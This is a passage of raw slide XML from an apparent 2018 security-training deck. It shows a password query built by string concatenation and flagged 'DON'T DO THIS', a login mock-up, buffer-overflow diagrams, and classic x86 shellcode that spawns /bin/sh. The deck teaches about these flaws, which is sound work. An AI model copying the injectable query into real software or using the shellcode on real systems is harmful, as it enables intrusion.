                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u.password='</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$password</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="This is a contrived example just to demonstrate the principle."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879779" y="12490960"/>
            <a:ext cx="6974508" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is a contrived example just to demonstrate the principle.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="70206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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="DON’T DO THIS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="358292"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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DON’T DO THIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="390" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8885585" y="688271"/>
            <a:ext cx="6612831" cy="5257201"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6612829" cy="5257199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="384" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6612830" cy="5257200"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="6612829" cy="5257199"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="382" name="frame.png" descr="frame.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="6612830" cy="5257200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="383" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="260436" y="940886"/>
                <a:ext cx="6091958" cy="4095901"/>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solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="385" name="Login"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2731442" y="907853"/>
              <a:ext cx="1149946" cy="625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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Login</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="386" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="2319418"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="387" name="Username"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420584" y="1691723"/>
              <a:ext cx="1678720" cy="536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600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="388" name="Password"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420584" y="3257500"/>
              <a:ext cx="1605360" cy="536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600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="389" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="3865684"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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539" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6465227" y="1243262"/>
            <a:ext cx="9268405" cy="12049584"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9268404" cy="12049583"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2508" name="Image" descr="Image"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9268405" cy="12049584"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2509" name="00"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5950683" y="4580923"/>
              <a:ext cx="539262" cy="370061"/>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latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>00</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2510" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4796796" y="3981659"/>
              <a:ext cx="539262" cy="370061"/>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11" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5385527" y="3981659"/>
              <a:ext cx="539262" cy="370061"/>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12" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5957438" y="3981659"/>
              <a:ext cx="539262" cy="370061"/>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13" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6546168" y="3981659"/>
              <a:ext cx="539262" cy="370061"/>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14" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4796796" y="3409748"/>
              <a:ext cx="539262" cy="370061"/>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15" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5385527" y="3409748"/>
              <a:ext cx="539262" cy="370061"/>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16" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5957438" y="3409748"/>
              <a:ext cx="539262" cy="370061"/>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17" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6546168" y="3409748"/>
              <a:ext cx="539262" cy="370061"/>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18" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4796796" y="2821017"/>
              <a:ext cx="539262" cy="370060"/>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19" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5385527" y="2821017"/>
              <a:ext cx="539262" cy="370060"/>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20" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5957438" y="2821017"/>
              <a:ext cx="539262" cy="370060"/>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21" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6546168" y="2821017"/>
              <a:ext cx="539262" cy="370060"/>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22" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4796796" y="2249106"/>
              <a:ext cx="539262" cy="370061"/>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23" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5385527" y="2249106"/>
              <a:ext cx="539262" cy="370061"/>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24" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5957438" y="2249106"/>
              <a:ext cx="539262" cy="370061"/>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25" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6546168" y="2249106"/>
              <a:ext cx="539262" cy="370061"/>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26" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4796796" y="4570390"/>
              <a:ext cx="539262" cy="370061"/>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27" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5385527" y="4570390"/>
              <a:ext cx="539262" cy="370061"/>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28" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5957438" y="4570390"/>
              <a:ext cx="539262" cy="370061"/>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29" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6546168" y="4570390"/>
              <a:ext cx="539262" cy="370061"/>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30" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4796796" y="5192763"/>
              <a:ext cx="539262" cy="370061"/>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31" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5385527" y="5192763"/>
              <a:ext cx="539262" cy="370061"/>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32" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5957438" y="5192763"/>
              <a:ext cx="539262" cy="370061"/>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33" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6546168" y="5192763"/>
              <a:ext cx="539262" cy="370061"/>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34" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5950683" y="1660375"/>
              <a:ext cx="539262" cy="370060"/>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35" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6546168" y="1660375"/>
              <a:ext cx="539262" cy="370060"/>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36" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5372018" y="1660375"/>
              <a:ext cx="539262" cy="370060"/>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37" name="90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4800108" y="1660375"/>
              <a:ext cx="539261" cy="370060"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7ECA9E"/>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200">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>90</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2538" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4858435" y="1895297"/>
              <a:ext cx="164279" cy="74646"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="88900" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
              <a:tailEnd type="stealth" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2540"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254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542" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2543" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2544" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2545" name="https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38D142"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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49"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550"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551" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2552" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2553" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-247254" y="2257826"/>
            <a:ext cx="24878508" cy="9200348"/>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2554" name="char shellcode[] =…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625192" y="2671762"/>
            <a:ext cx="17748456" cy="837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4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:t> shellcode[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:t> main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> *ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
